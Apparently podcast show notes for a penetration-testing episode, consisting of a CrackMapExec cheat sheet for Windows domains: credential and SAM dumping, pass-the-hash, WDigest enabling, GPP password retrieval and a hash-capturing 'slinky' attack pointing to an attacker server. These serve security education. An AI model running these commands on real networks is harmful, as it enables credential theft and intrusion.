SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:
# General enumeration to see if your account works, and where:
cme smb x.x.x.x -u username -p pass
# Check if print services are enabled:
cme smb x.x.x.x -u username -p pass -M spooler
# Check for the nopac vuln:
cme smb x.x.x.x -u username -p pass -M nopac
# Find GP passwords:
cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password
# Get list of targets with smb signing:
cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt
# Set wdigest flag:
cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable
# Dump creds/hashes:
cme smb x.x.x.x -u username -p pass -M lsassy
# Do pass the hash attacks
cme smb x.x.x.x -u username -H HASH
# Dump SAM database:
cme smb x.x.x.x -u username -p pass --sam
# Enumerate SMB shares
cme smb x.x.x.x -u username -p pass --shares
# Conduct slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7
# Cleanup from slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 CLEANUP=TRUE
Share on socials: